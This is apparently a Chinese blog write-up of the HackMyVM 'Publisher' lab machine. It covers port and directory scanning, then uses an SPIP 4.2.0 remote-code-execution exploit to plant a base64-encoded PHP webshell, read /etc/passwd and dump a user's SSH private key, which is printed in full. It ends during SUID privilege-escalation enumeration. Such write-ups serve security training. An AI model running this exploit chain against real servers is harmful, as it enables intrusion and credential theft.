{"id":750,"date":"2024-07-10T17:25:56","date_gmt":"2024-07-10T09:25:56","guid":{"rendered":"http:\/\/162.14.82.114\/?p=750"},"modified":"2024-07-10T17:25:56","modified_gmt":"2024-07-10T09:25:56","slug":"hmv-_-publisher","status":"publish","type":"post","link":"http:\/\/162.14.82.114\/index.php\/750\/07\/10\/2024\/","title":{"rendered":"hmv[-_-]Publisher"},"content":{"rendered":"<h1>Publisher<\/h1>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202407101724881.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202407101724881.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240710140036757\" style=\"zoom:50%;\" \/><\/div><br \/>\n<div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202407101724882.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202407101724882.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240710140611418\" style=\"zoom:50%;\" \/><\/div><\/p>\n<h2>\u4fe1\u606f\u641c\u96c6<\/h2>\n<h3>\u7aef\u53e3\u626b\u63cf<\/h3>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/publisher]\n\u2514\u2500$ rustscan -a $IP -- -A\n.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.\n| {}  }| { } |{ {__ {_   _}{ {__  \/  ___} \/ {} \\ |  `| |\n| .-. \\| {_} |.-._} } | |  .-._} }\\     }\/  \/\\  \\| |\\  |\n`-&#039; `-&#039;`-----&#039;`----&#039;  `-&#039;  `----&#039;  `---&#039; `-&#039;  `-&#039;`-&#039; `-&#039;\nThe Modern Day Port Scanner.\n________________________________________\n: https:\/\/discord.gg\/GFrQsGy           :\n: https:\/\/github.com\/RustScan\/RustScan :\n --------------------------------------\n\ud83c\udf0dHACK THE PLANET\ud83c\udf0d\n\n[~] The config file is expected to be at &quot;\/home\/kali\/.rustscan.toml&quot;\n[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers\n[!] Your file limit is very small, which negatively impacts RustScan&#039;s speed. Use the Docker image, or up the Ulimit with &#039;--ulimit 5000&#039;. \nOpen 192.168.0.188:80\nOpen 192.168.0.188:22\n\nPORT   STATE SERVICE REASON  VERSION\n22\/tcp open  ssh     syn-ack OpenSSH 8.2p1 Ubuntu 4ubuntu0.10 (Ubuntu Linux; protocol 2.0)\n| ssh-hostkey: \n|   3072 44:5f:26:67:4b:4a:91:9b:59:7a:95:59:c8:4c:2e:04 (RSA)\n| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDMc4hLykriw3nBOsKHJK1Y6eauB8OllfLLlztbB4tu4c9cO8qyOXSfZaCcb92uq\/Y3u02PPHWq2yXOLPler1AFGVhuSfIpokEnT2jgQzKL63uJMZtoFzL3RW8DAzunrHhi\/nQqo8sw7wDCiIN9s4PDrAXmP6YXQ5ekK30om9kd5jHG6xJ+\/gIThU4ODr\/pHAqr28bSpuHQdgphSjmeShDMg8wu8Kk\/B0bL2oEvVxaNNWYWc1qHzdgjV5HPtq6z3MEsLYzSiwxcjDJ+EnL564tJqej6R69mjII1uHStkrmewzpiYTBRdgi9A3Yb+x8NxervECFhUR2MoR1zD+0UJbRA2v1LQaGg9oYnYXNq3Lc5c4aXz638wAUtLtw2SwTvPxDrlCmDVtUhQFDhyFOu9bSmPY0oGH5To8niazWcTsCZlx2tpQLhF\/gS3jP\/fVw+H6Eyz\/yge3RYeyTv3ehV6vXHAGuQLvkqhT6QS21PLzvM7bCqmo1YIqHfT2DLi7jZxdk=\n|   256 0a:4b:b9:b1:77:d2:48:79:fc:2f:8a:3d:64:3a:ad:94 (ECDSA)\n| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBJNL\/iO8JI5DrcvPDFlmqtX\/lzemir7W+WegC7hpoYpkPES6q+0\/p4B2CgDD0Xr1AgUmLkUhe2+mIJ9odtlWW30=\n|   256 d3:3b:97:ea:54:bc:41:4d:03:39:f6:8f:ad:b6:a0:fb (ED25519)\n|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIFG\/Wi4PUTjReEdk2K4aFMi8WzesipJ0bp0iI0FM8AfE\n80\/tcp open  http    syn-ack Apache httpd 2.4.41 ((Ubuntu))\n| http-methods: \n|_  Supported Methods: POST OPTIONS HEAD GET\n|_http-title: Publisher&#039;s Pulse: SPIP Insights &amp; Tips\n|_http-server-header: Apache\/2.4.41 (Ubuntu)\nService Info: OS: Linux; CPE: cpe:\/o:linux:linux_kernel<\/code><\/pre>\n<h3>\u76ee\u5f55\u626b\u63cf<\/h3>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/publisher]\n\u2514\u2500$ gobuster dir -u http:\/\/$IP\/ -w \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt -x php,zip,bak,txt,html\n===============================================================\nGobuster v3.6\nby OJ Reeves (@TheColonial) &amp; Christian Mehlmauer (@firefart)\n===============================================================\n[+] Url:                     http:\/\/192.168.0.188\/\n[+] Method:                  GET\n[+] Threads:                 10\n[+] Wordlist:                \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt\n[+] Negative Status codes:   404\n[+] User Agent:              gobuster\/3.6\n[+] Extensions:              php,zip,bak,txt,html\n[+] Timeout:                 10s\n===============================================================\nStarting gobuster in directory enumeration mode\n===============================================================\n\/.html                (Status: 403) [Size: 278]\n\/images               (Status: 301) [Size: 315] [--&gt; http:\/\/192.168.0.188\/images\/]\n\/.php                 (Status: 403) [Size: 278]\n\/index.html           (Status: 200) [Size: 8686]\n\/spip                 (Status: 301) [Size: 313] [--&gt; http:\/\/192.168.0.188\/spip\/]\n\/.html                (Status: 403) [Size: 278]\n\/.php                 (Status: 403) [Size: 278]\n\/server-status        (Status: 403) [Size: 278]\nProgress: 1323360 \/ 1323366 (100.00%)\n===============================================================\nFinished\n===============================================================<\/code><\/pre>\n<h2>\u6f0f\u6d1e\u53d1\u73b0<\/h2>\n<h3>\u8e29\u70b9<\/h3>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202407101724884.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202407101724884.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240710140954527\" style=\"zoom:50%;\" \/><\/div><\/p>\n<h3>\u654f\u611f\u76ee\u5f55<\/h3>\n<pre><code class=\"language-bash\">http:\/\/192.168.0.188\/spip\/<\/code><\/pre>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202407101724885.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202407101724885.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240710141506863\" style=\"zoom:50%;\" \/><\/div><\/p>\n<h3>spip\u6f0f\u6d1e<\/h3>\n<p>\u770b\u4e0a\u53bb\u662f\u4e00\u4e2a\u7ec4\u4ef6\uff0c\u5c1d\u8bd5\u8fdb\u884c\u6f0f\u6d1e\u641c\u96c6\uff1a<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/publisher]\n\u2514\u2500$ whatweb http:\/\/$IP\/spip\nhttp:\/\/192.168.0.188\/spip [301 Moved Permanently] Apache[2.4.41], Country[RESERVED][ZZ], HTTPServer[Ubuntu Linux][Apache\/2.4.41 (Ubuntu)], IP[192.168.0.188], RedirectLocation[http:\/\/192.168.0.188\/spip\/], Title[301 Moved Permanently]\nhttp:\/\/192.168.0.188\/spip\/ [200 OK] Apache[2.4.41], Country[RESERVED][ZZ], HTML5, HTTPServer[Ubuntu Linux][Apache\/2.4.41 (Ubuntu)], IP[192.168.0.188], MetaGenerator[SPIP 4.2.0], SPIP[4.2.0][http:\/\/192.168.0.188\/spip\/local\/config.txt], Script[text\/javascript], Title[Publisher], UncommonHeaders[composed-by,link,x-spip-cache]<\/code><\/pre>\n<p>\u53d1\u73b0 SPIP \u7248\u672c\u53f7\uff0c\u5c1d\u8bd5\u8fdb\u884c\u641c\u96c6\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202407101724886.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202407101724886.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240710141759767\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>\u4e0b\u8f7d\u4e0b\u6765\u5c1d\u8bd5\u5229\u7528\uff0c\u4f46\u662f\u4e0d\u884c\uff0c\u5c1d\u8bd5\u641c\u7d22\u4e00\u4e0bgithub\u662f\u5426\u5b58\u5728\u76f8\u5173POC\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202407101724887.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202407101724887.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240710142048719\" style=\"zoom: 33%;\" \/><\/div><\/p>\n<p>\u53d1\u73b0\u4e0a\u4e0b\u4fe9\u662f\u4e00\u6837\u7684\uff0c\u5c1d\u8bd5\u6267\u884c\u4ee5\u4e0b\u770b\u770b\u80fd\u4e0d\u80fd\u6267\u884c\u547d\u4ee4\uff1a<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/publisher]\n\u2514\u2500$ python3 51536.py -u http:\/\/$IP\/spip -c &#039;echo 1 &gt; test&#039;\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/publisher]\n\u2514\u2500$ curl http:\/\/$IP\/spip\/test\n1<\/code><\/pre>\n<p>\u76f4\u63a5\u4e0a\u4f20\u53cd\u5f39shell\uff0c\u4f46\u662f\u5f39\u4e0d\u56de\u6765\uff0c\u5c1d\u8bd5\u7f16\u7801\u540e\u5199\u5165webshell\uff1a<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/publisher]\n\u2514\u2500$ python3 51536.py -u http:\/\/$IP\/spip -c &#039;echo &quot;PD89YCRfR0VUWzBdYD8+&quot; | base64 -d &gt; webshell.php&#039;\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/publisher]\n\u2514\u2500$ curl http:\/\/$IP\/spip\/webshell.php                                                                                  \n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/publisher]\n\u2514\u2500$ curl http:\/\/$IP\/spip\/webshell.php?0=whoami\nwww-data<\/code><\/pre>\n<p>\u5c1d\u8bd5\u591a\u4e2a\uff0c\u5982php\uff0cpython\uff0cbash\uff0cnetcat\u7b49\u53cd\u5f39shell\u7684payload\u4f46\u662f\u90fd\u4e0d\u884c\uff0c\u5c1d\u8bd5\u641c\u7d22\u4e00\u4e0b\u76f8\u5173\u6587\u4ef6\uff1a<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/publisher]\n\u2514\u2500$ curl http:\/\/$IP\/spip\/webshell.php?0=ls+-la\ntotal 164\ndrwxr-xr-x 11 www-data www-data  4096 Jul 10 06:40 .\ndrwxr-x---  5 www-data www-data  4096 Dec 20  2023 ..\n-rwxr-xr-x  1 www-data www-data  7045 Dec 20  2023 CHANGELOG.md\ndrwxr-xr-x  3 www-data www-data  4096 Dec 20  2023 IMG\n-rwxr-xr-x  1 www-data www-data 35147 Dec 20  2023 LICENSE\n-rwxr-xr-x  1 www-data www-data   842 Dec 20  2023 README.md\n-rwxr-xr-x  1 www-data www-data   178 Dec 20  2023 SECURITY.md\n-rwxr-xr-x  1 www-data www-data  1761 Dec 20  2023 composer.json\n-rwxr-xr-x  1 www-data www-data 27346 Dec 20  2023 composer.lock\ndrwxr-xr-x  3 www-data www-data  4096 Dec 20  2023 config\ndrwxr-xr-x 22 www-data www-data  4096 Dec 20  2023 ecrire\n-rwxr-xr-x  1 www-data www-data  4307 Dec 20  2023 htaccess.txt\n-rwxr-xr-x  1 www-data www-data    42 Dec 20  2023 index.php\ndrwxr-xr-x  5 www-data www-data  4096 Dec 20  2023 local\ndrwxr-xr-x 22 www-data www-data  4096 Dec 20  2023 plugins-dist\n-rwxr-xr-x  1 www-data www-data  3645 Dec 20  2023 plugins-dist.json\ndrwxr-xr-x 12 www-data www-data  4096 Dec 20  2023 prive\n-rwxr-xr-x  1 www-data www-data   973 Dec 20  2023 spip.php\n-rwxr-xr-x  1 www-data www-data  1212 Dec 20  2023 spip.png\n-rwxr-xr-x  1 www-data www-data  1673 Dec 20  2023 spip.svg\ndrwxr-xr-x 10 www-data www-data  4096 Dec 20  2023 squelettes-dist\n-rw-rw-rw-  1 www-data www-data    22 Jul 10 06:30 test\ndrwxr-xr-x  6 www-data www-data  4096 Jul 10 06:16 tmp\ndrwxr-xr-x  6 www-data www-data  4096 Dec 20  2023 vendor\n-rw-rw-rw-  1 www-data www-data    15 Jul 10 06:40 webshell.php\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/publisher]\n\u2514\u2500$ curl http:\/\/$IP\/spip\/webshell.php?0=cat+\/etc\/passwd\nroot:x:0:0:root:\/root:\/bin\/bash\ndaemon:x:1:1:daemon:\/usr\/sbin:\/usr\/sbin\/nologin\nbin:x:2:2:bin:\/bin:\/usr\/sbin\/nologin\nsys:x:3:3:sys:\/dev:\/usr\/sbin\/nologin\nsync:x:4:65534:sync:\/bin:\/bin\/sync\ngames:x:5:60:games:\/usr\/games:\/usr\/sbin\/nologin\nman:x:6:12:man:\/var\/cache\/man:\/usr\/sbin\/nologin\nlp:x:7:7:lp:\/var\/spool\/lpd:\/usr\/sbin\/nologin\nmail:x:8:8:mail:\/var\/mail:\/usr\/sbin\/nologin\nnews:x:9:9:news:\/var\/spool\/news:\/usr\/sbin\/nologin\nuucp:x:10:10:uucp:\/var\/spool\/uucp:\/usr\/sbin\/nologin\nproxy:x:13:13:proxy:\/bin:\/usr\/sbin\/nologin\nwww-data:x:33:33:www-data:\/var\/www:\/usr\/sbin\/nologin\nbackup:x:34:34:backup:\/var\/backups:\/usr\/sbin\/nologin\nlist:x:38:38:Mailing List Manager:\/var\/list:\/usr\/sbin\/nologin\nirc:x:39:39:ircd:\/var\/run\/ircd:\/usr\/sbin\/nologin\ngnats:x:41:41:Gnats Bug-Reporting System (admin):\/var\/lib\/gnats:\/usr\/sbin\/nologin\nnobody:x:65534:65534:nobody:\/nonexistent:\/usr\/sbin\/nologin\n_apt:x:100:65534::\/nonexistent:\/usr\/sbin\/nologin\nthink:x:1000:1000::\/home\/think:\/bin\/sh\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/publisher]\n\u2514\u2500$ curl http:\/\/$IP\/spip\/webshell.php?0=cat+\/home\/think\/user.txt\nfa229046d44eda6a3598c73ad96f4ca5  \n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/publisher]\n\u2514\u2500$ curl http:\/\/$IP\/spip\/webshell.php?0=cat+\/home\/think\/.ssh\/id_rsa\n-----BEGIN OPENSSH PRIVATE KEY-----\nb3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAABlwAAAAdzc2gtcn\nNhAAAAAwEAAQAAAYEAxPvc9pijpUJA4olyvkW0ryYASBpdmBasOEls6ORw7FMgjPW86tDK\nuIXyZneBIUarJiZh8VzFqmKRYcioDwlJzq+9\/2ipQHTVzNjxxg18wWvF0WnK2lI5TQ7QXc\nOY8+1CUVX67y4UXrKASf8l7lPKIED24bXjkDBkVrCMHwScQbg\/nIIFxyi262JoJTjh9Jgx\nSBjaDOELBBxydv78YMN9dyafImAXYX96H5k+8vC8\/I3bkwiCnhuKKJ11TV4b8lMsbrgqbY\nRYfbCJapB27zJ24a1aR5Un+Ec2XV2fawhmftS05b10M0QAnDEu7SGXG9mF\/hLJyheRe8lv\n+rk5EkZNgh14YpXG\/E9yIbxB9Rf5k0ekxodZjVV06iqIHBomcQrKotV5nXBRPgVeH71JgV\nQFkNQyqVM4wf6oODSqQsuIvnkB5l9e095sJDwz1pj\/aTL3Z6Z28KgPKCjOELvkAPcncuMQ\nTu+z6QVUr0cCjgSRhw4Gy\/bfJ4lLyX\/bciL5QoydAAAFiD95i1o\/eYtaAAAAB3NzaC1yc2\nEAAAGBAMT73PaYo6VCQOKJcr5FtK8mAEgaXZgWrDhJbOjkcOxTIIz1vOrQyriF8mZ3gSFG\nqyYmYfFcxapikWHIqA8JSc6vvf9oqUB01czY8cYNfMFrxdFpytpSOU0O0F3DmPPtQlFV+u\n8uFF6ygEn\/Je5TyiBA9uG145AwZFawjB8EnEG4P5yCBccotutiaCU44fSYMUgY2gzhCwQc\ncnb+\/GDDfXcmnyJgF2F\/eh+ZPvLwvPyN25MIgp4biiiddU1eG\/JTLG64Km2EWH2wiWqQdu\n8yduGtWkeVJ\/hHNl1dn2sIZn7UtOW9dDNEAJwxLu0hlxvZhf4SycoXkXvJb\/q5ORJGTYId\neGKVxvxPciG8QfUX+ZNHpMaHWY1VdOoqiBwaJnEKyqLVeZ1wUT4FXh+9SYFUBZDUMqlTOM\nH+qDg0qkLLiL55AeZfXtPebCQ8M9aY\/2ky92emdvCoDygozhC75AD3J3LjEE7vs+kFVK9H\nAo4EkYcOBsv23yeJS8l\/23Ii+UKMnQAAAAMBAAEAAAGBAIIasGkXjA6c4eo+SlEuDRcaDF\nmTQHoxj3Jl3M8+Au+0P+2aaTrWyO5zWhUfnWRzHpvGAi6+zbep\/sgNFiNIST2AigdmA1QV\nVxlDuPzM77d5DWExdNAaOsqQnEMx65ZBAOpj1aegUcfyMhWttknhgcEn52hREIqty7gOR5\n49F0+4+BrRLivK0nZJuuvK1EMPOo2aDHsxMGt4tomuBNeMhxPpqHW17ftxjSHNv+wJ4WkV\n8Q7+MfdnzSriRRXisKavE6MPzYHJtMEuDUJDUtIpXVx2rl\/L3DBs1GGES1Qq5vWwNGOkLR\nzz2F+3dNNzK6d0e18ciUXF0qZxFzF+hqwxi6jCASFg6A0YjcozKl1WdkUtqqw+Mf15q+KW\nxlkL1XnW4\/jPt3tb4A9UsW\/ayOLCGrlvMwlonGq+s+0nswZNAIDvKKIzzbqvBKZMfVZl4Q\nUafNbJoLlXm+4lshdBSRVHPe81IYS8C+1foyX+f1HRkodpkGE0\/4\/StcGv4XiRBFG1qQAA\nAMEAsFmX8iE4UuNEmz467uDcvLP53P9E2nwjYf65U4ArSijnPY0GRIu8ZQkyxKb4V5569l\nDbOLhbfRF\/KTRO7nWKqo4UUoYvlRg4MuCwiNsOTWbcNqkPWllD0dGO7IbDJ1uCJqNjV+OE\n56P0Z\/HAQfZovFlzgC4xwwW8Mm698H\/wss8Lt9wsZq4hMFxmZCdOuZOlYlMsGJgtekVDGL\nIHjNxGd46wo37cKT9jb27OsONG7BIq7iTee5T59xupekynvIqbAAAAwQDnTuHO27B1PRiV\nThENf8Iz+Y8LFcKLjnDwBdFkyE9kqNRT71xyZK8t5O2Ec0vCRiLeZU\/DTAFPiR+B6WPfUb\nkFX8AXaUXpJmUlTLl6on7mCpNnjjsRKJDUtFm0H6MOGD\/YgYE4ZvruoHCmQaeNMpc3YSrG\nvKrFIed5LNAJ3kLWk8SbzZxsuERbybIKGJa8Z9lYWtpPiHCsl1wqrFiB9ikfMa2DoWTuBh\n+Xk2NGp6e98Bjtf7qtBn\/0rBfdZjveM1MAAADBANoC+jBOLbAHk2rKEvTY1Msbc8Nf2aXe\nv0M04fPPBE22VsJGK1Wbi786Z0QVhnbNe6JnlLigk50DEc1WrKvHvWND0WuthNYTThiwFr\nLsHpJjf7fAUXSGQfCc0Z06gFMtmhwZUuYEH9JjZbG2oLnn47BdOnumAOE\/mRxDelSOv5J5\nM8X1rGlGEnXqGuw917aaHPPBnSfquimQkXZ55yyI9uhtc6BrRanGRlEYPOCR18Ppcr5d96\nHx4+A+YKJ0iNuyTwAAAA90aGlua0BwdWJsaXNoZXIBAg==\n-----END OPENSSH PRIVATE KEY-----<\/code><\/pre>\n<p>\u5c1d\u8bd5\u7528\u79c1\u94a5\u8fdb\u884c\u8fde\u63a5\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202407101724888.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202407101724888.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240710145347622\" style=\"zoom:50%;\" \/><\/div><\/p>\n<h2>\u63d0\u6743<\/h2>\n<h3>\u4fe1\u606f\u641c\u96c6<\/h3>\n<pre><code class=\"language-bash\">think@publisher:~$ ls -la\ntotal 48\ndrwxr-xr-x 8 think    think    4096 Feb 10 21:27 .\ndrwxr-xr-x 3 root     root     4096 Nov 13  2023 ..\nlrwxrwxrwx 1 root     root        9 Jun 21  2023 .bash_history -&gt; \/dev\/null\n-rw-r--r-- 1 think    think     220 Nov 14  2023 .bash_logout\n-rw-r--r-- 1 think    think    3771 Nov 14  2023 .bashrc\ndrwx------ 2 think    think    4096 Nov 14  2023 .cache\ndrwx------ 3 think    think    4096 Dec  8  2023 .config\ndrwx------ 3 think    think    4096 Feb 10 21:22 .gnupg\ndrwxrwxr-x 3 think    think    4096 Jan 10 12:46 .local\n-rw-r--r-- 1 think    think     807 Nov 14  2023 .profile\nlrwxrwxrwx 1 think    think       9 Feb 10 21:27 .python_history -&gt; \/dev\/null\ndrwxr-x--- 5 www-data www-data 4096 Dec 20  2023 spip\ndrwxr-xr-x 2 think    think    4096 Jan 10 12:54 .ssh\n-rw-r--r-- 1 root     root       35 Feb 10 21:20 user.txt\nlrwxrwxrwx 1 think    think       9 Feb 10 21:27 .viminfo -&gt; \/dev\/null\nthink@publisher:~$ find \/ -perm -u=s -type f 2&gt;\/dev\/null\n\/usr\/lib\/policykit-1\/polkit-agent-helper-1\n\/usr\/lib\/openssh\/ssh-keysign\n\/usr\/lib\/eject\/dmcrypt-get-device\n\/usr\/lib\/dbus-1.0\/dbus-daemon-launch-helper\n\/usr\/lib\/xorg\/Xorg.wrap\n\/usr\/sbin\/pppd\n\/usr\/sbin\/run_container\n\/usr\/bin\/at\n\/usr\/bin\/fusermount\n\/usr\/bin\/gpasswd\n\/usr\/bin\/chfn\n\/usr\/bin\/sudo\n\/usr\/bin\/chsh\n\/usr\/bin\/passwd\n\/usr\/bin\/mount\n\/usr\/bin\/su\n\/usr\/bin\/newgrp\n\/usr\/bin\/pkexec\n\/usr\/bin\/umount\nthink@publisher:~$ ls -la \/usr\/sbin\/run_container\n-rwsr-sr-x 1 root root 16760 Nov 14  2023 \/usr\/sbin\/run_container\nthink@publisher:~$ ls -la \/usr\/bin\/fusermount\n-rwsr-xr-x 1 root root 39144 Mar  7  2020 \/usr\/bin\/fusermount\nthink@publisher:~$ echo &#039;whoami&#039; | at now\nwarning: commands will be executed using \/bin\/sh\njob 1 at Wed Jul 10 06:59:00 2024<\/code><\/pre>\n<h3>\u5206\u6790\u7a0b\u5e8f<\/h3>\n<p>\u627e\u5230\u4e00\u4e2a<code>suid<\/code>\u6587\u4ef6\uff0c\u770b\u4e00\u4e0b\u662f\u4e2a\u5565\u60c5\u51b5\uff1a<\/p>\n<pre><code class=\"language-bash\">think@publisher:~$ strings \/usr\/sbin\/run_container\n\/lib64\/ld-linux-x86-64.so.2\nlibc.so.6\n__stack_chk_fail\nexecve\n__cxa_finalize\n__libc_start_main\nGLIBC_2.2.5\nGLIBC_2.4\n_ITM_deregisterTMCloneTable\n__gmon_start__\n_ITM_registerTMCloneTable\nu+UH\n[]A\\A]A^A_\n\/bin\/bash\n\/opt\/run_container.sh\n:*3$&quot;\nGCC: (Ubuntu 9.4.0-1ubuntu1~20.04.2) 